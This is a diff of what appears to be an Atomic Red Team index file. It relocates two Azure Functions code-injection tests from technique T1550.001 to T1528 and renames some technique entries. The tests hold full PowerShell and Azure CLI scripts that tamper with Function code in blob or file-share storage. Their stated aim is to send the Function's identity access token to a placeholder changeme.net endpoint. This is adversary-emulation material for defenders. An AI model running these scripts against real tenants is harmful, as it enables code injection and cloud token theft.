-        is expected to contain the tampered function presented in src/code_to_insert.py.
-        Note that the endpoint https://changeme.net needs to be adapted in your packed
-        function code.\n\nNote:\n- The Azure Function modified in this test must be
-        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
-        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-        \n- For Function code upload to Azure Functions that are hosted via Azure
-        Files in a File Share, refer to T1550.001 \"Azure - Functions code upload
-        - Functions code injection to retrieve the Functions identity access token\".\n-
-        The required input fields can be retrieved in a reconnaissance step in test
-        T1619 \"Azure - Enumerate Storage Account Objects via Key-based authentication
-        using Azure CLI\". The code of function apps may be inspected and prepared
-        from the result of test T1530 \"Azure - Dump Azure Storage Account Objects
-        via Azure CLI\".\n\nRequirements:\n- The test is intended to be executed in
-        interactive mode (with -Interactive parameter) in order to complete the az
-        login command when MFA is required.\n- The EntraID user must have the role
-        \"Storage Account Contributor\", or a role with similar permissions."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        container_name:
-          type: string
-          default: container_name_example
-          description: Name of the container that contains the function blob
-        blob_name:
-          type: string
-          default: blob_example
-          description: Name of the function blob
-        file_path_blob:
-          type: path
-          default: "$env:temp/T1550.001_function_code.zip"
-          description: Path to the function code file to upload as blob
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {    \n    $connectionString = az storage account
-          show-connection-string --name \"#{storage_account_name}\" --query connectionString
-          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + \"#{blob_name}\")\n
-          \   az storage blob download --connection-string $connectionString --container-name
-          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
-          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
-          blob version if download of existing blob succeeded\n        az storage
-          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
-          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}\n"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original blob file if upload succeeded
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
-    - name: Azure - Functions code upload - Functions code injection via File Share
-        modification to retrieve the Functions identity access token
-      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-      description: "This test injects code into an Azure Function (RCE) to perform
-        Subscription Privilege Escalation by retrieving the identity access token
-        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
-        executed, the \"https://changeme\" will retrieve the access token when the
-        function app is executed on behalf of the tenant. The function may be triggered
-        manually from authorized people, triggered in regular intervals, or in various
-        other ways. The access token can then be used to perform further attack steps
-        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
-        \n- The Azure Function modified in this test must be hosted via Azure Files
-        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
-        For Function code upload to Azure Functions that are hosted via Azure Blob
-        storage, refer to T1550.001 \"Azure - Functions code upload - Functions code
-        injection via Blob upload\".\n- The required input fields can be retrieved
-        in a reconnaissance step in test T1619 \"Azure - Enumerate Storage Account
-        Objects via Key-based authentication using Azure CLI\". The code of function
-        apps may be inspected and prepared from the result of test T1530 \"Azure -
-        Dump Azure Storage Account Objects via Azure CLI\".\n- Important: Change the
-        https://changeme.net in code_to_insert_path to a self-controlled endpoint.
-        This endpoint can be hosted e.g. as request bin via Pipedream to display the
-        body of incoming POST requests.\n- The default injected code to retrieve the
-        access token can be replaced by arbitrary other code. In this case: Replace
-        the code defined in code_to_insert_path\n\nRequirements:\n- The test is intended
-        to be executed in interactive mode (with -Interactive parameter) in order
-        to complete the az login command when MFA is required.\n- The EntraID user
-        must have the role \"Storage Account Contributor\", or a role with similar
-        permissions.\n\nExecution options: Defined by the input field execution_option\n-
-        insert_code: This option (1) downloads the existing funciton code into a tmp
-        file, (2) injects the code from code_to_insert_path at the beginning of the
-        file, and (3) uploads the tampered file to the targeted Azure Function code
-        (Azure File Share File).\n- replace_file: This option uploads the function
-        code defined in code_to_insert_path to the targeted Azure Function code (Azure
-        File Share File)."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        execution_option:
-          type: string
-          default: insert_code
-          description: Chooses execution option insert_code, or replace_file
-        file_share_name:
-          type: string
-          default: file_share_name_example
-          description: Name of the file share that is related to the Function
-        file_path:
-          type: path
-          default: site/wwwroot/function_app.py
-          description: Path to the Function file in the file share
-        code_to_insert_path:
-          type: path
-          default: "$PathToAtomicsFolder/T1550.001/src/code_to_insert.py"
-          description: The code that will be injected into the Function
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
-          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + $tmpOriginalFileName)\n
-          \   az storage file download --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
-          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
-          Upload new funciton code if download of existing code succeeded\n        if
-          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
-          file from file share for injection\n            $tmpFunctionCode = Join-Path
-          $env:temp/ (\"T1550.001_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
-          storage file download --account-name \"#{storage_account_name}\" --share-name
-          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
-          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code download failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
-          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
-          -Raw  # Load the content of the insert file\n            \n            $content
-          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
-          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
-          \           $content | Set-Content -Path $tmpFunctionCode       # Write
-          the modified content to the file\n            \n            # Upload file
-          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
-          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code upload failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
-          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
-          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
-          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
-          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
-          code upload failed.\"\n                exit 1\n            }\n            Write-Output
-          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
-          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original f file if upload succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-              }
-
-              # Delete tmp original file
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
 credential-access:
  T1557:
    technique:
@@ -48685,7 +48253,222 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-    atomic_tests: []
+      identifier: T1528
+    atomic_tests:
+    - name: Azure - Functions code upload - Functions code injection via Blob upload
+      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
+      description: "This test injects code into an Azure Function (RCE).\n\nAttack
+        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
+        to T1528 \"Azure - Functions code upload - Functions code injection to retrieve
+        the Functions identity access token\", the depicted code injection scenario
+        tampers the source code of Azure Functions to perform Subscription Privilege
+        Escalation by retrieving the identity access token of an Azure functions instance.
+        In this case, the prepared zip file (underlying package for a Function) is
+        expected to contain the tampered function presented in src/code_to_insert.py.
+        Note that the endpoint https://changeme.net needs to be adapted in your packed
+        function code.\n\nNote:\n- The Azure Function modified in this test must be
+        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
+        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
+        \n- For Function code upload to Azure Functions that are hosted via Azure
+        Files in a File Share, refer to T1528 \"Azure - Functions code upload - Functions
+        code injection to retrieve the Functions identity access token\".\n- The required
+        input fields can be retrieved in a reconnaissance step in test T1619 \"Azure
+        - Enumerate Storage Account Objects via Key-based authentication using Azure
+        CLI\". The code of function apps may be inspected and prepared from the result
+        of test T1530 \"Azure - Dump Azure Storage Account Objects via Azure CLI\".\n\nRequirements:\n-
+        The test is intended to be executed in interactive mode (with -Interactive
+        parameter) in order to complete the az login command when MFA is required.\n-
+        The EntraID user must have the role \"Storage Account Contributor\", or a
+        role with similar permissions."
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        storage_account_name:
+          type: string
+          default: storage_account_name_example
+          description: Name of storage account that is related to the Function
+        container_name:
+          type: string
+          default: container_name_example
+          description: Name of the container that contains the function blob
+        blob_name:
+          type: string
+          default: blob_example
+          description: Name of the function blob
+        file_path_blob:
+          type: path
+          default: "$env:temp/T1528_function_code.zip"
+          description: Path to the function code file to upload as blob
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Azure CLI must be installed
+        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+        get_prereq_command: Install-Module -Name Az -Force
+      executor:
+        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
+          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
+          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
+          be true or null\n    Write-Output \"Shared key access is disabled for this
+          storage account.\"\n} else {    \n    $connectionString = az storage account
+          show-connection-string --name \"#{storage_account_name}\" --query connectionString
+          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
+          = Join-Path $env:temp/ (\"T1528_tmp_original_\" + \"#{blob_name}\")\n    az
+          storage blob download --connection-string $connectionString --container-name
+          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
+          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
+          blob version if download of existing blob succeeded\n        az storage
+          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
+          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
+          \   } else {\n        Write-Output \"Download original function code failed.\"\n
+          \       exit 1\n    }\n}\n"
+        cleanup_command: |-
+          az login    # Log in to Azure CLI
+
+          # Upload previous funciton code
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
+
+          if ($LASTEXITCODE -eq 0) {
+              Write-Output "Uploaded original version of function code."
+
+              # Delete tmp original blob file if upload succeeded
+              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
+          } else {
+              Write-Output "Upload original function code failed."
+          }
+        name: powershell
+        elevation_required: false
+    - name: Azure - Functions code upload - Functions code injection via File Share
+        modification to retrieve the Functions identity access token
+      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
+      description: "This test injects code into an Azure Function (RCE) to perform
+        Subscription Privilege Escalation by retrieving the identity access token
+        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
+        executed, the \"https://changeme\" will retrieve the access token when the
+        function app is executed on behalf of the tenant. The function may be triggered
+        manually from authorized people, triggered in regular intervals, or in various
+        other ways. The access token can then be used to perform further attack steps
+        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
+        \n- The Azure Function modified in this test must be hosted via Azure Files
+        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
+        For Function code upload to Azure Functions that are hosted via Azure Blob
+        storage, refer to T1528 \"Azure - Functions code upload - Functions code injection
+        via Blob upload\".\n- The required input fields can be retrieved in a reconnaissance
+        step in test T1619 \"Azure - Enumerate Storage Account Objects via Key-based
+        authentication using Azure CLI\". The code of function apps may be inspected
+        and prepared from the result of test T1530 \"Azure - Dump Azure Storage Account
+        Objects via Azure CLI\".\n- Important: Change the https://changeme.net in
+        code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted
+        e.g. as request bin via Pipedream to display the body of incoming POST requests.\n-
+        The default injected code to retrieve the access token can be replaced by
+        arbitrary other code. In this case: Replace the code defined in code_to_insert_path\n\nRequirements:\n-
+        The test is intended to be executed in interactive mode (with -Interactive
+        parameter) in order to complete the az login command when MFA is required.\n-
+        The EntraID user must have the role \"Storage Account Contributor\", or a
+        role with similar permissions.\n\nExecution options: Defined by the input
+        field execution_option\n- insert_code: This option (1) downloads the existing
+        funciton code into a tmp file, (2) injects the code from code_to_insert_path
+        at the beginning of the file, and (3) uploads the tampered file to the targeted
+        Azure Function code (Azure File Share File).\n- replace_file: This option
+        uploads the function code defined in code_to_insert_path to the targeted Azure
+        Function code (Azure File Share File)."
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        storage_account_name:
+          type: string
+          default: storage_account_name_example
+          description: Name of storage account that is related to the Function
+        execution_option:
+          type: string
+          default: insert_code
+          description: Chooses execution option insert_code, or replace_file
+        file_share_name:
+          type: string
+          default: file_share_name_example
+          description: Name of the file share that is related to the Function
+        file_path:
+          type: path
+          default: site/wwwroot/function_app.py
+          description: Path to the Function file in the file share
+        code_to_insert_path:
+          type: path
+          default: "$PathToAtomicsFolder/T1528/src/code_to_insert.py"
+          description: The code that will be injected into the Function
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Azure CLI must be installed
+        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+        get_prereq_command: Install-Module -Name Az -Force
+      executor:
+        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
+          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
+          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
+          be true or null\n    Write-Output \"Shared key access is disabled for this
+          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
+          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
+          = Join-Path $env:temp/ (\"T1528_tmp_original_\" + $tmpOriginalFileName)\n
+          \   az storage file download --account-name \"#{storage_account_name}\"
+          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
+          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
+          Upload new funciton code if download of existing code succeeded\n        if
+          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
+          file from file share for injection\n            $tmpFunctionCode = Join-Path
+          $env:temp/ (\"T1528_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
+          storage file download --account-name \"#{storage_account_name}\" --share-name
+          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
+          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
+          \"Function code download failed.\"\n                exit 1\n            }\n
+          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
+          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
+          -Raw  # Load the content of the insert file\n            \n            $content
+          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
+          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
+          \           $content | Set-Content -Path $tmpFunctionCode       # Write
+          the modified content to the file\n            \n            # Upload file
+          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
+          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
+          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
+          \"Function code upload failed.\"\n                exit 1\n            }\n
+          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
+          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
+          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
+          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
+          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
+          code upload failed.\"\n                exit 1\n            }\n            Write-Output
+          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
+          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
+          \   } else {\n        Write-Output \"Download original function code failed.\"\n
+          \       exit 1\n    }\n}"
+        cleanup_command: |-
+          az login    # Log in to Azure CLI
+
+          # Upload previous funciton code
+          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
+
+          if ($LASTEXITCODE -eq 0) {
+              Write-Output "Uploaded original version of function code."
+
+              # Delete tmp original f file if upload succeeded
+              if ("#{execution_option}" -eq "insert_code") {
+                  $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
+                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
+              }
+
+              # Delete tmp original file
+              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
+          } else {
+              Write-Output "Upload original function code failed."
+          }
+        name: powershell
+        elevation_required: false
  T1552.006:
    technique:
      type: attack-pattern
@@ -14300,7 +14300,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14377,7 +14377,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44847,7 +44846,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44924,7 +44923,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48048,6 +48046,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -31497,7 +31497,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -31574,223 +31574,7 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
-    atomic_tests:
-    - name: Azure - Functions code upload - Functions code injection via Blob upload
-      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-      description: "This test injects code into an Azure Function (RCE).\n\nAttack
-        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
-        to T1550.001 \"Azure - Functions code upload - Functions code injection to
-        retrieve the Functions identity access token\", the depicted code injection
-        scenario tampers the source code of Azure Functions to perform Subscription
-        Privilege Escalation by retrieving the identity access token of an Azure functions
-        instance. In this case, the prepared zip file (underlying package for a Function)
-        is expected to contain the tampered function presented in src/code_to_insert.py.
-        Note that the endpoint https://changeme.net needs to be adapted in your packed
-        function code.\n\nNote:\n- The Azure Function modified in this test must be
-        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
-        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-        \n- For Function code upload to Azure Functions that are hosted via Azure
-        Files in a File Share, refer to T1550.001 \"Azure - Functions code upload
-        - Functions code injection to retrieve the Functions identity access token\".\n-
-        The required input fields can be retrieved in a reconnaissance step in test
-        T1619 \"Azure - Enumerate Storage Account Objects via Key-based authentication
-        using Azure CLI\". The code of function apps may be inspected and prepared
-        from the result of test T1530 \"Azure - Dump Azure Storage Account Objects
-        via Azure CLI\".\n\nRequirements:\n- The test is intended to be executed in
-        interactive mode (with -Interactive parameter) in order to complete the az
-        login command when MFA is required.\n- The EntraID user must have the role
-        \"Storage Account Contributor\", or a role with similar permissions."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        container_name:
-          type: string
-          default: container_name_example
-          description: Name of the container that contains the function blob
-        blob_name:
-          type: string
-          default: blob_example
-          description: Name of the function blob
-        file_path_blob:
-          type: path
-          default: "$env:temp/T1550.001_function_code.zip"
-          description: Path to the function code file to upload as blob
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {    \n    $connectionString = az storage account
-          show-connection-string --name \"#{storage_account_name}\" --query connectionString
-          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + \"#{blob_name}\")\n
-          \   az storage blob download --connection-string $connectionString --container-name
-          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
-          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
-          blob version if download of existing blob succeeded\n        az storage
-          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
-          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}\n"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original blob file if upload succeeded
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
-    - name: Azure - Functions code upload - Functions code injection via File Share
-        modification to retrieve the Functions identity access token
-      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-      description: "This test injects code into an Azure Function (RCE) to perform
-        Subscription Privilege Escalation by retrieving the identity access token
-        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
-        executed, the \"https://changeme\" will retrieve the access token when the
-        function app is executed on behalf of the tenant. The function may be triggered
-        manually from authorized people, triggered in regular intervals, or in various
-        other ways. The access token can then be used to perform further attack steps
-        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
-        \n- The Azure Function modified in this test must be hosted via Azure Files
-        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
-        For Function code upload to Azure Functions that are hosted via Azure Blob
-        storage, refer to T1550.001 \"Azure - Functions code upload - Functions code
-        injection via Blob upload\".\n- The required input fields can be retrieved
-        in a reconnaissance step in test T1619 \"Azure - Enumerate Storage Account
-        Objects via Key-based authentication using Azure CLI\". The code of function
-        apps may be inspected and prepared from the result of test T1530 \"Azure -
-        Dump Azure Storage Account Objects via Azure CLI\".\n- Important: Change the
-        https://changeme.net in code_to_insert_path to a self-controlled endpoint.
-        This endpoint can be hosted e.g. as request bin via Pipedream to display the
-        body of incoming POST requests.\n- The default injected code to retrieve the
-        access token can be replaced by arbitrary other code. In this case: Replace
-        the code defined in code_to_insert_path\n\nRequirements:\n- The test is intended
-        to be executed in interactive mode (with -Interactive parameter) in order
-        to complete the az login command when MFA is required.\n- The EntraID user
-        must have the role \"Storage Account Contributor\", or a role with similar
-        permissions.\n\nExecution options: Defined by the input field execution_option\n-
-        insert_code: This option (1) downloads the existing funciton code into a tmp
-        file, (2) injects the code from code_to_insert_path at the beginning of the
-        file, and (3) uploads the tampered file to the targeted Azure Function code
-        (Azure File Share File).\n- replace_file: This option uploads the function
-        code defined in code_to_insert_path to the targeted Azure Function code (Azure
-        File Share File)."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        execution_option:
-          type: string
-          default: insert_code
-          description: Chooses execution option insert_code, or replace_file
-        file_share_name:
-          type: string
-          default: file_share_name_example
-          description: Name of the file share that is related to the Function
-        file_path:
-          type: path
-          default: site/wwwroot/function_app.py
-          description: Path to the Function file in the file share
-        code_to_insert_path:
-          type: path
-          default: "$PathToAtomicsFolder/T1550.001/src/code_to_insert.py"
-          description: The code that will be injected into the Function
-      dependency_executor_name: powershell
